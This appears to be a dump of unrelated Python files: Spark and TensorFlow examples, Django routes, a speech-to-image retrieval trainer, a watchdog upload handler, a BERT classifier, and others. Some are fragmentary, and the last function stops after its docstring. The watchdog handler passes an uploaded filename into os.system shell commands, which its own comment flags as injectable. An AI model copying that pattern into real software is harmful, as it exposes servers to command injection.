# header=true uses the first CSV row as column names; inferSchema=true
# samples the data to pick column types instead of defaulting to strings.
lines = spark.read.option("header", "true").option("inferSchema", "true").csv("file:///scourse/fakefriends-header.csv")
# Select only age and numFriends columns, we don't need to show it, we just need to assign the results to a variable
friendsByAge = lines.select("age", "friends")
# From friendsByAge we group by "age" and then compute average
friendsByAge.groupBy("age").avg("friends").show()
# Sorted
friendsByAge.groupBy("age").avg("friends").sort("age").show()
# Formatted more nicely
# In order to aggregate or use special functions such as round and avg together you need to use a special function called .agg
# in other words, .agg allows us to clump together multiple commands on an aggregated group results
friendsByAge.groupBy("age").agg(func.round(func.avg("friends"), 2)).sort("age").show()
# With a custom column name
# we name the column name: friends_avg with the value from .alias('friends_avg)
friendsByAge.groupBy("age").agg(func.round(func.avg("friends"), 2)
    .alias("friends_avg")).sort("age").show()
# Release the session's resources.
spark.stop()
|
""" MULTIVARIATE TIME SERIES SINGLE POINT FORECAST
----------------------------------------------
Implementation of a lstm recurrent neural network for multivariate time series forecasting of a single point in the future.
This script uses a weather time series dataset, which contains 14 features collected every 10 minutes between 2009 and 2016.
Code reference: https://www.tensorflow.org/tutorials/structured_data/time_series#single_step_model
"""
# -------------------------------------------------------------------------------
# 0. IMPORT LIBRARIES
# -------------------------------------------------------------------------------
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
# Set the seed
tf.random.set_seed(13)
# -------------------------------------------------------------------------------
# 1. PREPARE THE DATA
# -------------------------------------------------------------------------------
# Import the dataset
climate = pd.read_csv('climate dataset/extracted/jena_climate_2009_2016.csv')
print('-'*96, '\n', climate.head())
# Select three features
multi_data = climate[['p (mbar)', 'T (degC)', 'rho (g/m**3)']]
# NOTE(review): assigning .index on a column-sliced frame may trigger
# pandas' SettingWithCopy warning — confirm it behaves as intended.
multi_data.index = climate['Date Time']
print('-'*96, '\n', multi_data.head())
# Keep only the raw ndarray from here on.
multi_data = multi_data.values
# Standardize the features using the parameters of the training set
# (mean/std are computed on the first `train_split` rows only, to avoid
# leaking validation statistics into the normalization).
train_split = 300000
multi_train_mean = multi_data[:train_split].mean(axis=0)
multi_train_std = multi_data[:train_split].std(axis=0)
multi_data_std = (multi_data - multi_train_mean) / multi_train_std
# Create time series of features and targets for train and valid subsets
def multi_dataset_generator(dataset, target, start_index, end_index, history_len, target_len, step, single_step):
    """Slice a multivariate series into (history window, future target) pairs.

    Each sample is dataset[i : i + history_len : step]. Its label is either
    the single target value `target_len` steps past the window (when
    `single_step` is true) or the whole slice of the next `target_len`
    target values. `end_index=None` means "up to len(dataset) - target_len".
    Returns (samples, labels) as numpy arrays.
    """
    if end_index is None:
        end_index = len(dataset) - target_len
    windows = []
    labels = []
    for start in range(start_index, end_index - history_len):
        window_index = range(start, start + history_len, step)
        windows.append(dataset[window_index])
        horizon = start + history_len
        if single_step:
            labels.append(target[horizon + target_len])
        else:
            labels.append(target[horizon: horizon + target_len])
    return np.array(windows), np.array(labels)
# Window of 720 past observations, subsampled every 6th point; the label is
# the temperature 72 steps after the window.
history_len = 720
target_len = 72
step = 6
multi_single_x_train_std, multi_single_y_train_std = multi_dataset_generator(multi_data_std, multi_data_std[:, 1], 0, train_split, history_len, target_len, step, single_step=True)
multi_single_x_valid_std, multi_single_y_valid_std = multi_dataset_generator(multi_data_std, multi_data_std[:, 1], train_split, None, history_len, target_len, step, single_step=True)
# Create the train and valid subsets containing tuples of size (120x3) and (1,);
# then cache and shuffle the dataset of tuples and create batches with 256 tuples each
batch_size = 256
multi_ds_train_std = tf.data.Dataset.from_tensor_slices((multi_single_x_train_std, multi_single_y_train_std))
multi_ds_train_std = multi_ds_train_std.cache().shuffle(10000).batch(batch_size).repeat()
multi_ds_valid_std = tf.data.Dataset.from_tensor_slices((multi_single_x_valid_std, multi_single_y_valid_std))
multi_ds_valid_std = multi_ds_valid_std.batch(batch_size).repeat()
# Peek at one batch to illustrate the dataset structure.
for batch in multi_ds_train_std.take(1):
    array_time_series_of_features = batch[0]
    array_of_targets = batch[1]
print('-'*96,
      '\nThe dataset is made up of several batches, each containing an array of 256 time series of the features'
      '\nand an array of 256 targets. In particular, for each tuple (time series of the features - target) the',
      '\ntarget is 72 elements after the last element of the time series of the features.\n',
      '\n*** BATCH 0',
      '\n -- Tuple 0\n', array_time_series_of_features.numpy()[0], array_of_targets.numpy()[0],
      '\n -- Tuple 255\n', array_time_series_of_features.numpy()[255], array_of_targets.numpy()[255])
# -------------------------------------------------------------------------------
# 2. DESIGN THE MODEL
# -------------------------------------------------------------------------------
# Design the lstm recurrent neural network: one LSTM layer feeding a single
# dense output unit (the predicted standardized temperature).
lstm_model = tf.keras.models.Sequential()
lstm_model.add(tf.keras.layers.LSTM(units=32, return_sequences=False, input_shape=multi_single_x_train_std.shape[-2:]))
lstm_model.add(tf.keras.layers.Dense(1))
# Print the model summary
print('-'*96)
lstm_model.summary()
print('Input shape: (time steps x num features) =', multi_single_x_train_std.shape[-2:],
      '\nNote that the batch size is not specified in "input shape"',
      '\nNote that the number of batches is irrelevant')
# Compile the model to specify optimizer and loss function
lstm_model.compile(optimizer=tf.keras.optimizers.RMSprop(), loss='mae')
# -------------------------------------------------------------------------------
# 3. TRAIN THE MODEL
# -------------------------------------------------------------------------------
# Train the lstm recurrent neural network
print('-' * 96, '\nInput for training: dataset made up of several batches each containing 256 tuples.')
history = lstm_model.fit(multi_ds_train_std, epochs=10, steps_per_epoch=200, validation_data=multi_ds_valid_std, validation_steps=50)
# Visualize the learning curve
hist = history.history
plt.figure()
plt.plot(hist['loss'], 'b', label='Training loss')
plt.plot(hist['val_loss'], 'r', label='Validation loss')
plt.xlabel('Epoch')
plt.title('Training and validation loss')
plt.legend()
plt.tick_params(axis='both', which='major')
# -------------------------------------------------------------------------------
# 3. MAKE PREDICTIONS
# -------------------------------------------------------------------------------
# Create a function to plot the history, true value and model prediction
def plot_prediction(data, delta, title):
    """Plot history, true future and model prediction on one figure.

    data: [history, true_future, prediction]; the history series is drawn
    against negative time steps ending at 0, the other two as single
    markers at time-step `delta`. Returns the pyplot module for chaining.
    """
    plt.figure()
    labels = ['History', 'True Future', 'Model Prediction']
    marker = ['.-', 'bx', 'rx']
    time_steps = list(range(-data[0].shape[0], 0))
    for idx, series in enumerate(data):
        if idx == 0:
            # History: a line over the past window.
            plt.plot(time_steps, series.flatten(), marker[idx], label=labels[idx])
        else:
            # Truth / prediction: single markers at the forecast horizon.
            plt.plot(delta, series, marker[idx], label=labels[idx])
    plt.xlim([time_steps[0], (delta+5)*2])
    plt.xlabel('Time-Step')
    plt.title(title)
    plt.legend()
    return plt
# Make a few predictions
print('-' * 96, '\nInput for predicting: dataset made up of several batches each containing 256 tuples.')
# Predict on three validation batches and plot the first tuple of each;
# column 1 of the features is the (standardized) temperature history.
for batch in multi_ds_valid_std.take(3):
    array_time_series_of_features = batch[0]
    array_of_targets = batch[1]
    prediction = lstm_model.predict(array_time_series_of_features)
    plot = plot_prediction([array_time_series_of_features.numpy()[0][:, 1], array_of_targets.numpy()[0], prediction[0]], 12, 'Simple LSTM model')
# -------------------------------------------------------------------------------
# 5. GENERAL
# -------------------------------------------------------------------------------
# Show plots
plt.show()
class Solution:
    def firstMissingPositive(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        Return the smallest positive integer absent from nums.

        O(N) time, O(N) space: the answer is at most len(nums) + 1, so a
        single membership structure plus a scan from 1 suffices. A set is
        the idiomatic choice here (the original used a dict with dummy
        values). TODO: the O(1)-space variant would place each value v at
        index v-1 in-place instead.
        """
        seen = set(nums)
        candidate = 1
        while candidate in seen:
            candidate += 1
        return candidate
|
from collections import deque
# Effects are consumed from the front of their queue, casings from the back.
effects = deque([int(n) for n in input().split(", ")])
casings = deque([int(n) for n in input().split(", ")])
# Target sum -> bomb type; "quantity" counts how many of each were built.
bombs_types = {40: {"name": "Datura Bombs", "quantity": 0},
               60: {"name": "Cherry Bombs", "quantity": 0},
               120: {"name": "Smoke Decoy Bombs", "quantity": 0}
               }
while effects and casings:
    res = effects[0] + casings[-1]
    if res in bombs_types:
        # Matching sum: build the bomb and consume both materials.
        bombs_types[res]["quantity"] += 1
        effects.popleft()
        casings.pop()
    else:
        # No bomb matched: weaken the current casing and retry.
        casings[-1] -= 5
    bombs_count = [data["quantity"] for _, data in bombs_types.items()]
    # The pouch is full once there are at least 3 bombs of every type.
    if bombs_count[0] >= 3 and bombs_count[1] >= 3 and bombs_count[2] >= 3:
        print(f"Bene! You have successfully filled the bomb pouch!")
        break
else:
    # while/else: the loop exhausted its materials without `break`.
    print(f"You don't have enough materials to fill the bomb pouch.")
print(f"Bomb Effects: {'empty' if not effects else ', '.join([str(n) for n in effects])}")
print(f"Bomb Casings: {'empty' if not casings else ', '.join([str(n) for n in casings])}")
# Report counts ordered alphabetically by bomb name.
bombs_types = {data["name"]: data["quantity"] for _, data in sorted(bombs_types.items(), key=lambda x: x[1]["name"])}
[print(f"{n}: {q}") for n, q in bombs_types.items()]
|
from django.urls import path
from . import views
# Namespace so URLs reverse as "account:login".
app_name = "account"
urlpatterns = [
    path('login', views.acc_login, name="login"),
]
|
from django.conf.urls import *
from django.contrib import admin
from HelloWorld.view import hello
from HelloWorld.testdb import testdb
from HelloWorld import search
from HelloWorld import search2
admin.autodiscover()
# django.conf.urls.patterns() was deprecated in Django 1.8 and removed in
# 1.10; the supported replacement is a plain list of url() routes, which
# dispatches identically. (url is available via the wildcard import above.)
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^hello/$', hello),
    url(r'^testdb/$', testdb),
    url(r'^search-form/$', search.search_form),
    url(r'^search/$', search.search),
    url(r'^search-post/$', search2.search_post),
]
########################### train.py #######################################
# This code implements the training procedure for the speech-to-image
# retrival model for spoken words and visual objects. To run the code,
# simply modify the data paths for the data and pretrain models to the
# right paths, copy and paste the hg16_hinge_loss function to
# tflearn/objective.py and run the command 'python train.py' on the
# terminal.
#
# Author: Liming Wang
# Date created: May. 23rd, 2018
############################################################################
import numpy as np
import h5py
import tensorflow as tf
import tflearn
import copy
import json
from word_recognition.scnn_train import *
from image_grounding.image_encoder_pretrain import *
DEBUG = False
def cosine_similarity(a_vec, v_vec):
    """Pairwise cosine similarity between rows of a_vec and v_vec,
    clipped at zero by a ReLU."""
    unit_a = tf.nn.l2_normalize(a_vec, dim=0)
    unit_v = tf.nn.l2_normalize(v_vec, dim=0)
    similarity = tf.matmul(unit_a, unit_v, transpose_b=True)
    return tf.nn.relu(similarity)
# Hinge loss function used by Harwath and Glass 2016; y_true is used only to match the pattern of tflearn objective function
'''def hg16_hinge_loss(y_pred, y_true):
with tf.name_scope(None):
return tf.reduce_mean(tf.nn.relu(y_pred - tf.diag(y_pred) + 1)) + tf.reduce_sum(tf.nn.relu(tf.transpose(y_pred) - tf.diag(y_pred) + 1))
'''
def select_retrieval_database(a_feat, v_feat, y, ind2sent_file, im2sent_file, random=False):
    """Pick one caption per image and return the matching rows of the
    audio features, visual features and labels.

    im2sent_file maps image -> list of its sentences; ind2sent_file lists
    sentences in feature-row order. With random=True a random caption per
    image is chosen, otherwise the first one. The chosen row indices are
    also written to experiments/dbid2id_test.txt.
    """
    with open(im2sent_file, 'r') as f:
        im2sent = json.load(f)
    with open(ind2sent_file, 'r') as f:
        ind2sent = f.read().strip().split('\n')
    sent2ind = {sentence: idx for idx, sentence in enumerate(ind2sent)}
    selected_indices = []
    for im in im2sent.keys():
        sents = im2sent[im]
        if random:
            sent = sents[np.random.randint(0, len(sents))]
        else:
            sent = sents[0]
        selected_indices.append(sent2ind[sent])
    np.savetxt('experiments/dbid2id_test.txt', selected_indices)
    if DEBUG:
        print(a_feat.shape)
        print(len(selected_indices))
    return a_feat[selected_indices], v_feat[selected_indices], y[selected_indices]
def select_negative_examples(grp_list_tr, random=True):
    """For each positive example, sample one feature pair from a group of a
    *different* concept.

    grp_list_tr: iterable of (concept_name, group) pairs; each group maps
    keys to items exposing 'vgg_penult' and 'fbank'.
    Returns (neg_vgg, neg_fbank) arrays with one negative per positive.
    NOTE(review): the `random` flag is accepted but unused (sampling is
    always random) — kept for interface compatibility.
    """
    neg_vgg = []
    neg_fbank = []
    concepts = [c for c, grp in grp_list_tr]
    nc = len(concepts)
    # BUGFIX: the original looped `for c, grp in enumerate(grp_list_tr)`,
    # so `grp` was the whole (concept, group) tuple (grp.items() raised
    # AttributeError) and `c` was an int index that never equalled a
    # concept string — the "different concept" filter excluded nothing.
    for concept, grp in grp_list_tr:
        nk = len(grp.items())
        # Other concepts, with their positions in grp_list_tr.
        cneg2ind = {c2: i for i, c2 in enumerate(concepts) if not c2 == concept}
        cneg = [c2 for c2 in concepts if not c2 == concept]
        # One random "wrong" concept per positive example in this group.
        inds_neg = np.random.randint(low=0, high=nc-1, size=(nk,))
        for i in inds_neg:
            grp_neg = grp_list_tr[cneg2ind[cneg[i]]][1]
            keys_neg = sorted(grp_neg.keys())
            nk_neg = len(keys_neg)
            ind_key_neg = np.random.randint(low=0, high=nk_neg-1)
            neg_vgg.append(grp_neg[keys_neg[ind_key_neg]]['vgg_penult'])
            neg_fbank.append(grp_neg[keys_neg[ind_key_neg]]['fbank'])
    return np.array(neg_vgg), np.array(neg_fbank)
def image_encoder(scopes=[None, None], reuse=False):
    """Image branch: 4096-d VGG penultimate features -> 512-d embedding.

    scopes[0] names the input layer, scopes[1] the fully-connected scope.
    NOTE(review): the mutable default list is shared across calls; it is
    only read here, never mutated, so behaviour is unaffected.
    """
    inputs = tflearn.input_data(shape=[None, 4096], name=scopes[0])
    embedding = tflearn.fully_connected(inputs, 512, scope=scopes[1], reuse=reuse)
    return embedding
def retrieve(s_predict, ntop):
    """Column indices of the `ntop` largest entries of every row of the
    similarity matrix.

    Returns an int array of shape (ntop, n): row k holds each query's
    k-th best match. The matrix is copied, so s_predict is not modified.
    """
    dummy = -2  # sentinel below any valid similarity (scores are ReLU'd, so >= 0)
    s = copy.deepcopy(s_predict)
    n = s.shape[0]
    max_k_ids = np.zeros((ntop, n), dtype=int)
    for i in range(ntop):
        max_ids = np.argmax(s, axis=1)
        max_k_ids[i, :] = max_ids
        for j in range(n):
            # Knock out this round's winner so the next pass finds the runner-up.
            s[j, int(max_ids[j])] = dummy
    return max_k_ids
def recall_op(s_predict, ntop, save_file=None):
    # Calculate the recall score by finding the top k elements of every column
    # of the similarity matrix; the ground-truth match of row i is column i.
    max_k_ids = retrieve(s_predict, ntop)
    # BUGFIX: `n` was undefined here in the original (NameError at runtime).
    n = s_predict.shape[0]
    dev = max_k_ids - np.linspace(0, n-1, n)
    if save_file:
        np.savetxt(save_file, max_k_ids.T)
    # Fraction of queries whose correct column appears among the top `ntop`.
    return np.mean(np.min(np.abs(dev), axis=0) == 0)
def recall_op_concept(s_predict, y_gt, ntop, save_file=None):
    """Concept-level recall@ntop: a retrieval counts as a hit when the
    retrieved item's argmax concept label equals the query's."""
    max_k_ids = retrieve(s_predict, ntop)
    if DEBUG:
        print(max_k_ids.T.shape)
    # Concept label of every retrieved item, per query, per rank.
    max_lbls = [[np.argmax(y_gt[max_id]) for max_id in id_row]
                for id_row in max_k_ids.T.tolist()]
    gt_labels = np.argmax(y_gt, axis=1)
    dev = np.array(max_lbls).T - gt_labels
    if save_file:
        ntx = len(y_gt)
        np.savetxt(save_file, np.concatenate([np.expand_dims(np.arange(ntx), axis=1), max_k_ids.T], axis=1))
    return np.mean(np.min(np.abs(dev), axis=0) == 0)
# Concept-based Latent SCNN
def CLSCNN(nclass, weight_file=None, max_margin=False, sentence=False):
    """Build the concept-based latent SCNN retrieval model.

    The speech (SCNN) and image encoders are fused by elementwise product;
    two softmax heads — joint (out1) and speech-only (out2) — are trained
    with categorical cross entropy and merged into one tflearn DNN.
    NOTE(review): weight_file and max_margin are currently unused here;
    the max-margin variant below is commented out.
    """
    sp_enc = SCNN(0, classify=False, sentence=sentence)
    im_enc = image_encoder(scopes=['in_pos', 'fc_im'])
    # Fuse the two modalities with an elementwise product.
    comb_enc = sp_enc * im_enc
    net1 = tflearn.fully_connected(comb_enc, nclass, activation='softmax', scope='out1')
    net2 = tflearn.fully_connected(sp_enc, nclass, activation='softmax', scope='out2')
    # Define the regression layer for sp2im retriever
    '''if max_margin:
        #accuracy = tflearn.metrics.accuracy
        im_enc_neg = image_encoder(scopes=['in_neg', 'fc_im'], reuse=True)
        comb_enc_neg = sp_enc * im_enc_neg
        net_neg = tflearn.fully_connected(comb_enc, nclass, activation='softmax', scope='out', reuse=True)
        net_comb = tflearn.regression([net, net_neg], optimizer='adam', metric=None, learning_rate=1e-5, loss='maxmargin_categorical_crossentropy')
    else:'''
    accuracy = tflearn.metrics.accuracy_multihot(nhot_max=5)
    reg1 = tflearn.regression(net1, optimizer='adam', metric=accuracy, learning_rate=1e-5, loss='categorical_crossentropy')
    reg2 = tflearn.regression(net2, optimizer='adam', metric=accuracy, learning_rate=1e-5, loss='categorical_crossentropy')
    merge = tflearn.merge([reg1, reg2], mode='concat', axis=1)
    if DEBUG:
        print('Ok here line 106!')
    return tflearn.DNN(merge)
# Concept-based Latent SCNN with cross entropy + max margin loss
def CLSCNN2(nclass, weight_file=None, sentence=True):
    """Variant of CLSCNN: a sigmoid multi-label head trained with weighted
    cross entropy plus a cosine-similarity head trained with the HG16
    hinge loss (requires hg16_hinge_loss patched into tflearn/objectives).
    NOTE(review): weight_file is accepted but unused.
    """
    sp_enc = SCNN(0, classify=False, sentence=sentence)
    im_enc = image_encoder(scopes=['in_pos', 'fc_im'])
    comb_enc = sp_enc * im_enc
    net1 = tflearn.fully_connected(comb_enc, nclass, activation='sigmoid')
    # Speech-vs-image similarity matrix for the retrieval objective.
    net2 = cosine_similarity(sp_enc, im_enc)
    # Define the regression layer for sp2im retriever
    accuracy = tflearn.metrics.accuracy_multihot()
    reg1 = tflearn.regression(net1, optimizer='adam', metric=accuracy, learning_rate=1e-5, loss='weighted_sigmoid_categorical_crossentropy')
    recall = tflearn.metrics.recall(n=1)
    reg2 = tflearn.regression(net2, optimizer='adam', metric=recall, learning_rate=1e-5, loss='hg16_hinge_loss')
    net = tflearn.merge([reg1, reg2], mode='concat', axis=1)
    return tflearn.DNN(net, tensorboard_dir='./experiments/')
def train(data_file, nclass, max_margin=False, hinge_loss=False, sentence=False, sp2im_model=None):
    """Train the speech-to-image (sp2im) retrieval model.

    data_file: HDF5 file with 'train'/'test'/'val' groups. With
        sentence=True each group holds flat 'fbank'/'vgg_penult'/'lbl'
        datasets; otherwise it holds per-concept sub-groups whose items
        carry 'fbank'/'vgg_penult'/'concept_lbl'.
    nclass: number of concept classes.
    max_margin / hinge_loss: select the loss (and hence model) variant.
    sp2im_model: optional checkpoint path to warm-start from.
    NOTE(review): `time` is not imported in this file's visible imports;
    it presumably arrives via the wildcard imports at the top — confirm.
    """
    # Load the data from h5 file
    h5_feat = h5py.File(data_file)
    data_dir = '/'.join(data_file.split('/')[:-1]) + '/'
    # split into training and testing set
    grp_feat_tr = h5_feat['train']
    grp_feat_tx = h5_feat['test']
    grp_feat_val = h5_feat['val']
    grps_tr = grp_feat_tr.items()
    if sentence:
        a_feat_tr = np.array(grp_feat_tr['fbank'])
        v_feat_tr = np.array(grp_feat_tr['vgg_penult'])
        y_tr = np.array(grp_feat_tr['lbl'])
    else:
        # Flatten (concept -> items) into one list; capped at 64 examples.
        tr_list = [d for c, grp in grps_tr for k, d in grp.items() if k]
        tr_list = tr_list[:64]
        a_feat_tr = np.array([dset['fbank'] for dset in tr_list])
        v_feat_tr = np.array([dset['vgg_penult'] for dset in tr_list])
        y_tr = np.array([dset['concept_lbl'] for dset in tr_list])
    if DEBUG:
        print(a_feat_tr.shape, v_feat_tr.shape, y_tr.shape)
    if sentence:
        a_feat_tx = np.array(grp_feat_tx['fbank'])
        v_feat_tx = np.array(grp_feat_tx['vgg_penult'])
        y_tx = np.array(grp_feat_tx['lbl'])
    else:
        grps_tx = grp_feat_tx.items()
        tx_list = [d for c, grp in grps_tx for k, d in grp.items() if k]
        tx_list = tx_list[:64]
        a_feat_tx = np.array([dset['fbank'] for dset in tx_list])
        v_feat_tx = np.array([dset['vgg_penult'] for dset in tx_list])
        y_tx = np.array([dset['concept_lbl'] for dset in tx_list])
    if sentence:
        a_feat_val = np.array(grp_feat_val['fbank'])
        v_feat_val = np.array(grp_feat_val['vgg_penult'])
        y_val = np.array(grp_feat_val['lbl'])
    else:
        grps_val = grp_feat_val.items()
        val_list = [d for c, grp in grps_val for k, d in grp.items() if k]
        val_list = val_list[:64]
        a_feat_val = np.array([dset['fbank'] for dset in val_list])
        v_feat_val = np.array([dset['vgg_penult'] for dset in val_list])
        y_val = np.array([dset['concept_lbl'] for dset in val_list])
    # Change the features to the right shape
    if DEBUG:
        print(a_feat_tx.shape, v_feat_tx.shape, y_tx.shape)
    a_feat_tr = np.transpose(np.expand_dims(a_feat_tr, 1), [0, 1, 3, 2])
    a_feat_tx = np.transpose(np.expand_dims(a_feat_tx, 1), [0, 1, 3, 2])
    a_feat_val = np.transpose(np.expand_dims(a_feat_val, 1), [0, 1, 3, 2])
    v_feat_tr = np.squeeze(v_feat_tr, axis=1)
    v_feat_tx = np.squeeze(v_feat_tx, axis=1)
    v_feat_val = np.squeeze(v_feat_val, axis=1)
    # Initialize the sp2im retriever
    tf.reset_default_graph()
    g1 = tf.Graph()
    # Number of training epochs per fit() call (the original comment said
    # "20 epochs", which was stale).
    nep = 50
    batch_size = 128
    with g1.as_default():
        if not max_margin:
            if not hinge_loss:
                model_sp2im = CLSCNN(nclass=nclass, sentence=sentence)
            else:
                model_sp2im = CLSCNN2(nclass=nclass, sentence=sentence)
            if sp2im_model:
                model_sp2im.load(sp2im_model)
            if not hinge_loss:
                model_sp2im.fit([a_feat_tr, v_feat_tr], [y_tr, y_tr], n_epoch=nep, batch_size=batch_size, validation_set=([a_feat_val, v_feat_val], [y_val, y_val]), shuffle=True, show_metric=True)
                model_sp2im.save('sp2im_wrd_model_tflearn{}'.format(time.strftime("-%y-%m-%d-%H", time.localtime())))
            else:
                # Resample the retrieval database (one random caption per
                # image) each round so the hinge loss sees varied pairings.
                for i in range(5):
                    a_feat_tr_sample, v_feat_tr_sample, y_tr_sample = select_retrieval_database(a_feat_tr, v_feat_tr, y_tr, ind2sent_file=data_dir+'ind2sent_train_cleanup.txt', im2sent_file=data_dir+'im2sent_train.json', random=True)
                    a_feat_val_sample, v_feat_val_sample, y_val_sample = select_retrieval_database(a_feat_val, v_feat_val, y_val, ind2sent_file=data_dir+'ind2sent_val_cleanup.txt', im2sent_file=data_dir+'im2sent_val.json', random=True)
                    if DEBUG:
                        print(a_feat_tr_sample.shape, v_feat_tr_sample.shape, y_tr_sample.shape)
                    model_sp2im.fit([a_feat_tr_sample, v_feat_tr_sample], [y_tr_sample, y_tr_sample], n_epoch=nep, batch_size=batch_size, validation_set=([a_feat_val_sample, v_feat_val_sample], [y_val_sample, y_val_sample]), shuffle=True, show_metric=True)
                    model_sp2im.save('sp2im_wrd_model_tflearn{}'.format(time.strftime("-%y-%m-%d-%H", time.localtime())))
        else:
            model_sp2im = CLSCNN(nclass=nclass, max_margin=True)
            # BUGFIX: the original read `iv_feat_tr_neg, a_feat_tr_neg = ...`
            # (typo — `v_feat_tr_neg` used below was never defined) and
            # `v_feat_val_neg, v_feat_val_neg = ...` (the duplicated name
            # discarded the audio negatives).
            # NOTE(review): grps_val is only bound when sentence=False;
            # this branch raises with sentence=True, as in the original.
            v_feat_tr_neg, a_feat_tr_neg = select_negative_examples(grps_tr)
            v_feat_val_neg, a_feat_val_neg = select_negative_examples(grps_val)
            model_sp2im.fit([a_feat_tr, v_feat_tr, v_feat_tr_neg], y_tr, n_epoch=nep, batch_size=batch_size, validation_set=([a_feat_val, v_feat_val, v_feat_val_neg], y_val), shuffle=True, show_metric=False)
            model_sp2im.save('sp2im_wrd_model_maxmargin_tflearn{}'.format(time.strftime("-%y-%m-%d-%H", time.localtime())))
if __name__ == "__main__":
    #train('/home/lwang114/data/flickr/flickr8k_sp2im_feats/flickr_wrd_fbank_penult_70concepts.h5', nclass=70, max_margin=False)
    #train('/home/lwang114/spring2018/sp2im_word/data/flickr_sentence_segment_807_2018/flickr_sent_fbank_penult_segmented2.h5', nclass=70, hinge_loss=True, sentence=True) #sp2im_model='/home/lwang114/spring2018/sp2im_word/sp2im_wrd_model_tflearn-18-07-15-17')
    train('/home/lwang114/spring2018/sp2im_word/data/flickr_sentence/flickr_sent_fbank_penult_order.h5', nclass=70, hinge_loss=True, sentence=True)
|
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
import socket
import os
IP = "127.0.0.1"
Port = 8051
class eventHandler(FileSystemEventHandler):
    """Logs all the events captured."""
    def on_created(self, event):
        # When a .png appears in the watched tree, run the MATLAB `inflator`
        # script to build an .obj mesh and copy the result to ./objDownloads.
        # print (event.src_path)
        # Drop the leading "./" from the reported path.
        # NOTE(review): assumes the observer was started on '.', so paths
        # always begin with "./" — confirm before reusing elsewhere.
        trimmedsrc = event.src_path[2:]
        extension = trimmedsrc.split(".")
        # print (trimmedsrc, extension[-1])
        if extension[-1] == "png":
            # print ("image uploaded\n")
            # run matlab script
            # NOTE(review): the file stem is interpolated into a shell
            # command via os.system; a crafted filename could inject shell
            # syntax — consider subprocess with an argv list.
            command = "matlab -nodisplay -nosplash -r \"inflator('./imageUploads/{0}.png', './tempObj/{0}.obj');exit;\"".format(extension[0].split('/')[-1])
            # print ("executing: ", command)
            os.system(command)
            command = "cp ./tempObj/{0}.obj ./objDownloads/{0}.obj;".format(extension[0].split('/')[-1])
            os.system(command)
        # if extension[-1] == "obj":
        # sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # sock.sendto(trimmedsrc, (IP, Port))
        # sock.close()
        # print("Sent " + trimmedsrc)
        # logging.info("Created %s: %s", what, event.src_path)
if __name__ == "__main__":
    # Log to stdout with timestamps (file logging is left disabled).
    logging.basicConfig(
        # filename = "log.txt",
        # filemode = "a",
        level=logging.INFO,
        format='%(asctime)s - %(message)s',
        datefmt='%Y-%m-%d %H:%M:%S')
    # Watch the directory given on the command line (default: cwd).
    path = sys.argv[1] if len(sys.argv) > 1 else '.'
    # event_handler = LoggingEventHandler()
    handler = eventHandler()
    observer = Observer()
    observer.schedule(handler, path, recursive=True)
    observer.start()
    try:
        # Keep the main thread alive while the observer thread watches.
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()
|
import subprocess
class SubprocessWrapper(object):
    """Thin convenience wrapper around subprocess.Popen.

    The command may be given as an argv list or as a single space-separated
    string. With ``require_out`` the captured stdout/stderr are returned
    from call(); with ``require_log`` (or the class-wide VERBOSE flag) the
    child's output streams straight through instead of being piped.
    ``require_out`` and ``require_log`` are mutually exclusive.
    """

    VERBOSE = False

    def __init__(self, arguments, working_directory=None, require_out=False, require_log=False):
        assert isinstance(arguments, list) or isinstance(arguments, str)
        assert require_out != require_log or require_out is False
        if isinstance(arguments, str):
            arguments = arguments.split(' ')
        assert len(arguments) > 0
        self.arguments = arguments
        self.require_out = require_out
        # Logging mode lets output flow to the parent's streams (pipe=None),
        # unless the caller also asked for captured output.
        wants_log = require_log or SubprocessWrapper.VERBOSE
        pipe = None if wants_log and not require_out else subprocess.PIPE
        self.process = subprocess.Popen(arguments, stdout=pipe, stderr=pipe, cwd=working_directory)
        self.code = 0

    def call(self):
        """Wait for the child; return code, or (code, stdout, stderr) when
        require_out was set."""
        out, err = self.process.communicate()
        self.code = self.process.returncode
        if self.require_out:
            return self.code, out.decode(), err.decode()
        return self.code
|
import tensorflow as tf
from models import BaseModel
class BertClassifier(BaseModel):
    """BERT encoder + dropout + dense head for sequence classification.

    `output` selects what call() returns: raw 'logits' or log-softmax
    'predictions'.
    """
    def __init__(self,
                 bert_config,
                 sequence_length,
                 num_classes,
                 initializer='glorot_uniform',
                 output='logits',
                 dropout_rate=0.1,
                 **kwargs):
        super().__init__(**kwargs)
        self.bert_config = bert_config
        # Constructor arguments retained for introspection/serialization.
        # NOTE(review): dropout_rate is not recorded here — confirm whether
        # it should be part of the saved config.
        self._config = {
            'bert_config': bert_config,
            'sequence_length': sequence_length,
            'num_classes': num_classes,
            'initializer': initializer,
            'output': output,
        }
        self._encoder_layer = self._get_transformer_encoder(bert_config, sequence_length)
        self._cls_dropout = tf.keras.layers.Dropout(rate=dropout_rate)
        self._logits_layer = tf.keras.layers.Dense(
            num_classes,
            activation=None,
            kernel_initializer=initializer,
            name='predictions/transform/logits')
        # Build layers eagerly: the encoder takes [word_ids, mask, type_ids],
        # each of shape (batch, sequence_length).
        self._encoder_layer.build([[None, self._config["sequence_length"]], [None, self._config["sequence_length"]],
                                   [None, self._config["sequence_length"]]])
        self._logits_layer.build([None, self.bert_config.hidden_size])
    def call(self, inputs):
        # inputs: dict with 'input_word_ids', 'input_mask', 'input_type_ids';
        # the encoder's pooled (CLS) output feeds dropout + the dense head.
        inputs = [tf.cast(inputs["input_word_ids"], tf.int32), tf.cast(inputs["input_mask"], tf.int32),
                  tf.cast(inputs["input_type_ids"], tf.int32)]
        _, cls_output = self._encoder_layer(inputs)
        cls_output = self._cls_dropout(cls_output)
        logits = self._logits_layer(cls_output)
        predictions = tf.keras.layers.Activation(tf.nn.log_softmax)(logits)
        if self._config['output'] == 'logits':
            return logits
        elif self._config['output'] == 'predictions':
            return predictions
        raise ValueError(('Unknown `output` value "%s". `output` can be either "logits" or '
                          '"predictions"') % self._config['output'])
|
def get_next_target(s):
    """Return (url, end_index) for the first quoted ``<a href=`` link in *s*.

    *end_index* is the position of the closing quote so a caller can resume
    scanning from there.  (No-match behaviour mirrors str.find's -1s.)
    """
